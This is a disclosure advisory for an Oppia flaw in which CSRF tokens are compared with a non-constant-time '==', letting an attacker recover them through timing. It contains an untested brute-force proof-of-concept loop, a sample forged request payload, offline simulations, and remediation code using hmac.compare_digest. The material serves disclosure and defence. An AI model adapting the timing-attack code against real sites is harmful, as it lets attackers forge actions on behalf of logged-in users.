CVE-2023-40021: Timing Attack Reveals CSRF Tokens

Vulnerability Report

Summary

When comparing a received CSRF token against the expected token, Oppia uses the string equality operator (==). This operator does not run in constant time, so it is vulnerable to timing attacks. By repeatedly submitting invalid tokens and measuring how long the server takes to reject them, an attacker can brute-force the expected CSRF token character by character. Once they have recovered the token, they can submit a forged request on behalf of a logged-in user and perform privileged actions as that user.

Details

The function that validates received CSRF tokens is oppia.core.controllers.base.CsrfTokenManager.is_csrf_token_valid, in oppia/core/controllers/base.py (lines 964 to 990 at commit 3a05c35):

def is_csrf_token_valid(cls, user_id: Optional[str], token: str) -> bool:
    """Validates a given CSRF token.

    Args:
        user_id: str|None. The user_id to validate the CSRF token against.
        token: str. The CSRF token to validate.

    Returns:
        bool. Whether the given CSRF token is valid.
    """
    try:
        parts = token.split('/')
        if len(parts) != 2:
            return False

        issued_on = int(parts[0])
        age = cls._get_current_time() - issued_on
        if age > cls._CSRF_TOKEN_AGE_SECS:
            return False

        authentic_token = cls._create_token(user_id, issued_on)
        if authentic_token == token:
            return True

        return False
    except Exception:
        return False

The vulnerability is on line 985 of oppia/core/controllers/base.py (commit 3a05c35):

if authentic_token == token:

In CPython, the equality operator on unicode objects uses memcmp to compare the objects' values (see Objects/unicodeobject.c in the CPython repo):

static int
unicode_compare_eq(PyObject *str1, PyObject *str2)
{
    int kind;
    const void *data1, *data2;
    Py_ssize_t len;
    int cmp;

    len = PyUnicode_GET_LENGTH(str1);
    if (PyUnicode_GET_LENGTH(str2) != len)
        return 0;
    kind = PyUnicode_KIND(str1);
    if (PyUnicode_KIND(str2) != kind)
        return 0;
    data1 = PyUnicode_DATA(str1);
    data2 = PyUnicode_DATA(str2);

    cmp = memcmp(data1, data2, len * kind);
    return (cmp == 0);
}

Here is an example implementation of memcmp from gcc (from libgcc/memcmp.c in the gcc repo):

int
memcmp (const void *str1, const void *str2, size_t count)
{
  const unsigned char *s1 = str1;
  const unsigned char *s2 = str2;

  while (count-- > 0)
    {
      if (*s1++ != *s2++)
	  return s1[-1] < s2[-1] ? -1 : 1;
    }
  return 0;
}

Notice that this function is not constant-time. It returns as soon as it finds a differing byte, so the earlier str1 and str2 first differ, the sooner it returns. Consequently, if the received CSRF token and the expected one differ at an earlier index, is_csrf_token_valid() returns sooner. This tells an attacker how long a prefix of the expected token they have guessed correctly. For details on how an attacker can abuse this information, see the PoC below.
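To make the leak concrete, here is a small Python model that mirrors unicode_compare_eq() and the byte-by-byte memcmp() shown above. It is a sketch, not CPython's real code path. It counts how many bytes are compared before the function returns, and that step count stands in for running time. The expected token is the example token from the PoC payload, used purely as test data.

```python
from typing import Tuple


def compare_eq_steps(expected: str, received: str) -> Tuple[bool, int]:
    """Model `expected == received` as unicode_compare_eq() plus memcmp().

    Returns (equal, steps), where steps is the number of byte comparisons made.
    Assumes ASCII input (one byte per character), as CSRF tokens are.
    Illustrative model only, not CPython's actual implementation.
    """
    a = expected.encode("ascii")
    b = received.encode("ascii")
    # unicode_compare_eq() returns early when the lengths differ, before memcmp().
    if len(a) != len(b):
        return False, 0
    steps = 0
    for x, y in zip(a, b):
        steps += 1
        # Like the gcc memcmp(), stop at the first differing byte.
        if x != y:
            return False, steps
    return True, steps


if __name__ == "__main__":
    prefix = "1691808272/"
    expected = prefix + "GONUjFmtQN0DkHt67ucdZw=="
    for known in ("", "GO", "GONU"):
        # Pad each guess with 'A' so it keeps the expected length of 35 characters.
        received = prefix + known + "A" * (22 - len(known)) + "=="
        print(repr(known), compare_eq_steps(expected, received))
    # Prints:
    # '' (False, 12)
    # 'GO' (False, 14)
    # 'GONU' (False, 16)
```

Each additional correct leading character adds one comparison before rejection, which is the signal the PoC measures. Production memcmp implementations often compare several bytes at a time, so the real timing signal may be coarser than this per-byte model suggests.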

PoC

Note: I have not tested this PoC. I include it to illustrate how this vulnerability could be abused.

Prerequisites: To pull off this attack, an attacker needs a user to be logged in to Oppia and to have an attacker-controlled website open at the same time.

Attack: The attacker-controlled website issues requests to a protected Oppia endpoint, for example a PUT request to https://www.oppiatestserver.org/preferenceshandler/data to change the user's bio with the following payload:

{
  "payload": {"update_type": "user_bio", "data": "testing"},
  "csrf_token": "1691808272/GONUjFmtQN0DkHt67ucdZw==",
  "source": "https://www.oppiatestserver.org/preferences"
}

The token above is well-formed but incorrect. An attacker could generate such a placeholder like this:

>>> import base64
>>> import hmac
>>> import time
>>> digest = base64.urlsafe_b64encode(hmac.digest(b'key', b'msg', digest='md5')).decode('utf-8')
>>> timestamp = int(time.time())
>>> print(f'{timestamp}/{digest}')
1691808272/GONUjFmtQN0DkHt67ucdZw==

Since the user is logged in to Oppia, their valid session cookie will be sent along with the request, making it appear that the request came from an authorized user. However, the CSRF token will be invalid (here and elsewhere, I'm ignoring the negligible probability of a 128-bit collision). To forge a valid token, the attacker needs to guess the 128-bit digest portion of the token, which is normally infeasible. In this case, however, they can take advantage of the timing vulnerability discussed above. Here's how the attack might work (the code is in Python for clarity; to run on the attacker-controlled website, it would be implemented in JavaScript):

import time

import numpy as np

# Defined in RFC 4648, section 5: https://datatracker.ietf.org/doc/html/rfc4648.html#section-5
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"
# How many trials to average timing measurements over. Averaging reduces noise from network latency.
TRIALS = 5
# The server recomputes the expected token from the timestamp embedded in the submitted token,
# so the attacker fixes one timestamp and reuses it for every guess.
ISSUED_ON = int(time.time())

# A base64-encoded MD5 hash is always 22 characters from ALPHABET, followed by two padding characters.
# This is because an MD5 hash is 128 bits. Each Base64 character provides log2(64)=6 bits of information,
# so we need ceil(128/6)=22 Base64 characters to encode the hash. Then 2 padding characters get added
# because Base64 encodes every 3 bytes as 4-character chunks, so the length of the base64 string needs to
# be a multiple of 4. Source: https://stackoverflow.com/a/13296298.
# Python strings are immutable, so the guess is kept as a list of characters.
guess = list(ALPHABET[0] * 22 + '==')
for known_chars in range(22):
    avg_times = []
    for char in ALPHABET:
        guess[known_chars] = char
        total_time = 0.0
        for _ in range(TRIALS):
            start = time.perf_counter()
            # Suppose we have a submit_request() function that takes a timestamp and a digest guess,
            # crafts a request with csrf_token=f'{timestamp}/{digest}', and sends it.
            submit_request(ISSUED_ON, ''.join(guess))
            end = time.perf_counter()
            total_time += end - start
        avg_times.append(total_time / TRIALS)
    # With the correct guess, the submitted and expected tokens share a longer prefix, so rejection takes longer.
    guess[known_chars] = ALPHABET[int(np.argmax(avg_times))]

At some point during the last iteration of the outer loop (or earlier, if the attacker got lucky), the guess is correct and the server accepts the request, completing the attack.
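The guessing loop can be checked offline against a simulated server. This sketch is not a real attack. The secret, user ID, HMAC message layout in create_token(), and the noise-free "timing" oracle are all hypothetical. The oracle simply returns the length of the matching prefix instead of measuring network time.

```python
import base64
import hashlib
import hmac

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"

# Hypothetical server-side values; the attacker never sees SECRET.
SECRET = b"server-side-secret"
USER_ID = "uid_victim"
ISSUED_ON = 1691808272  # The timestamp the attacker fixed in the forged token.


def create_token(user_id: str, issued_on: int) -> str:
    """Hypothetical stand-in for the server's token builder (HMAC-MD5, base64url)."""
    msg = f"{user_id}/{issued_on}".encode("utf-8")
    digest = hmac.new(SECRET, msg, hashlib.md5).digest()
    return f"{issued_on}/{base64.urlsafe_b64encode(digest).decode('ascii')}"


def simulated_rejection_time(token: str) -> int:
    """Noise-free stand-in for a timing measurement.

    Returns how many leading characters of `token` match the expected token
    (0 if the lengths differ), which is what an early-exit comparison leaks.
    """
    expected = create_token(USER_ID, ISSUED_ON)
    if len(token) != len(expected):
        return 0
    matched = 0
    for submitted_char, expected_char in zip(token, expected):
        if submitted_char != expected_char:
            break
        matched += 1
    return matched


def recover_digest() -> str:
    """Recover the 22-character digest one position at a time, as in the PoC."""
    guess = list(ALPHABET[0] * 22 + "==")
    for position in range(22):
        scores = []
        for char in ALPHABET:
            guess[position] = char
            scores.append(simulated_rejection_time(f"{ISSUED_ON}/{''.join(guess)}"))
        # Keep the candidate whose rejection "took longest".
        guess[position] = ALPHABET[scores.index(max(scores))]
    return "".join(guess)


if __name__ == "__main__":
    recovered = f"{ISSUED_ON}/{recover_digest()}"
    print(recovered == create_token(USER_ID, ISSUED_ON))  # True
```

With a perfect oracle, one query per candidate suffices. Real measurements are noisy, which is why the PoC averages several trials per candidate.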

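Caveats: The server recomputes the expected token from the timestamp embedded in the submitted token, so the attacker must reuse a single timestamp for every guess. If the timestamp changed between requests (for example, if each request used the current time), the expected digest would change along with it. The attacker would then have to restart the brute-forcing from scratch. With a fixed timestamp, the attacker is limited only by the server's token age check (_CSRF_TOKEN_AGE_SECS), not by a one-second window. The attack needs at most 22 × 64 × 5 = 7,040 requests, which, while not trivial, is feasible. The attacker also has several ways to reduce the cost. They can stop as soon as a request is accepted: in expectation, about halfway through the 64 × 5 = 320 requests for the final character. They may be able to optimize the brute-forcing logic to use fewer trials. And they can run this attack against many users, so that even a low probability of guessing the token leads to at least some successful attacks.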
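For scale, here is a rough comparison of the two search spaces for the 128-bit digest. The digest occupies 22 Base64 characters with 64 possible values each, and the comparison ignores the repeated trials per candidate:

```latex
\underbrace{2^{128} \approx 3.4 \times 10^{38}}_{\text{possible digests, no timing leak}}
\qquad \text{versus} \qquad
\underbrace{22 \times 64 = 1408}_{\text{candidates when guessing one character at a time}}
```

The timing leak turns a search that grows exponentially with the digest length into one that grows linearly with it.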

Suggested Remediation

Essential: The expected and received CSRF tokens should instead be compared using hmac.compare_digest(). This function avoids content-based short-circuiting, so its running time does not reveal where the tokens differ. The new code would look like this:

            if hmac.compare_digest(authentic_token, token):

Note that compare_digest() only accepts two ASCII-only str objects or two bytes-like objects. Other inputs, such as a str containing non-ASCII characters, raise TypeError.
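Here is a standalone sketch of the validator shown earlier, with the comparison swapped for hmac.compare_digest(). The secret, the HMAC message layout in create_token(), the use of SHA-256, and the explicit `now` parameter are hypothetical stand-ins for illustration, not Oppia's actual code.

```python
import base64
import hashlib
import hmac
import time
from typing import Optional

# Hypothetical stand-ins for illustration; Oppia's real secret and token layout may differ.
SECRET = b"server-side-secret"
CSRF_TOKEN_AGE_SECS = 48 * 60 * 60  # The 48-hour lifetime described in this report.


def create_token(user_id: Optional[str], issued_on: int) -> str:
    """Hypothetical token builder: '<issued_on>/<base64url HMAC-SHA256 digest>'."""
    msg = f"{user_id}/{issued_on}".encode("utf-8")
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return f"{issued_on}/{base64.urlsafe_b64encode(digest).decode('ascii')}"


def is_csrf_token_valid(
        user_id: Optional[str], token: str, now: Optional[int] = None) -> bool:
    """Same checks as the original validator, but with a constant-time comparison."""
    try:
        parts = token.split("/")
        if len(parts) != 2:
            return False
        issued_on = int(parts[0])
        current_time = int(time.time()) if now is None else now
        if current_time - issued_on > CSRF_TOKEN_AGE_SECS:
            return False
        authentic_token = create_token(user_id, issued_on)
        # compare_digest() does not short-circuit at the first differing byte.
        # Comparing UTF-8 bytes avoids the TypeError it raises for non-ASCII str.
        return hmac.compare_digest(
            authentic_token.encode("utf-8"), token.encode("utf-8"))
    except Exception:
        return False


if __name__ == "__main__":
    token = create_token("uid_1", 1000)
    print(is_csrf_token_valid("uid_1", token, now=1000))  # True
    print(is_csrf_token_valid("uid_2", token, now=1000))  # False
```

Comparing encoded bytes means a non-ASCII token is rejected by the comparison itself rather than by raising TypeError. The surrounding try/except would also catch that error, so either form rejects such tokens.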

Suggested:

1. Instead of computing the HMAC with MD5, use SHA-256. While the known attacks on MD5 do not compromise the security of an HMAC, it would be prudent to move away from MD5 since attacks will likely improve over time.
2. CSRF tokens should ideally be scoped to user sessions, but Oppia currently leaves them valid for 48 hours. This means that when a user logs out and logs back in, a CSRF token from the previous session could still be valid, which is not ideal. I don't see any attacks that this would allow, but session-scoped CSRF tokens are a common best practice (see OWASP link below).
3. CSRF tokens should include a nonce, not just a timestamp, so that consecutive calls in the same second produce different tokens. Again, this is more of a best practice (see OWASP link below) than a protection against an attack (at least that I can see).
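The SHA-256 and nonce suggestions above could be combined roughly as follows. This sketch signs the user ID, timestamp, and a fresh random nonce with HMAC-SHA256. The three-part token layout, the secret, and the function name are assumptions for illustration, not necessarily the format used by the actual fix.

```python
import base64
import hashlib
import hmac
import secrets
import time
from typing import Optional

SECRET = b"server-side-secret"  # Hypothetical; a real deployment loads this from secure config.


def create_token(user_id: Optional[str], issued_on: Optional[int] = None) -> str:
    """Hypothetical token layout: '<issued_on>/<nonce>/<base64url HMAC-SHA256 digest>'."""
    if issued_on is None:
        issued_on = int(time.time())
    # A fresh random nonce per call, so tokens issued in the same second differ.
    # token_urlsafe() output never contains '/', so the token splits cleanly on it.
    nonce = secrets.token_urlsafe(16)
    msg = f"{user_id}/{issued_on}/{nonce}".encode("utf-8")
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return f"{issued_on}/{nonce}/{base64.urlsafe_b64encode(digest).decode('ascii')}"


if __name__ == "__main__":
    first = create_token("uid_1", issued_on=1000)
    second = create_token("uid_1", issued_on=1000)
    print(first != second)  # True (barring a 128-bit nonce collision)
```

A matching validator would split the token into its three parts, recompute the digest from them, and compare it with hmac.compare_digest().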

Impact

An attacker who can lure a logged-in Oppia user to a malicious website can perform any change on Oppia that the user is authorized to do, including changing profile information; creating, deleting, and changing explorations; etc. Note that the attacker cannot change a user's login credentials since those are managed by Google, which (hopefully) has its own CSRF protections.

Remediation

The essential remediation and suggested remediations 1 and 3 were implemented in #18769, which was merged in commit b89bf80. This commit was deployed to production as part of May 2023 hotfix 2.

Timeline

Reported: 2023-08-11
CVE-2023-40021 assigned: 2023-08-14
Remediated:
- Remediation Merged: 2023-08-12
- Remediation Deployed: 2023-08-14 (in May 2023 hotfix 2)
Disclosed: 2023-08-16
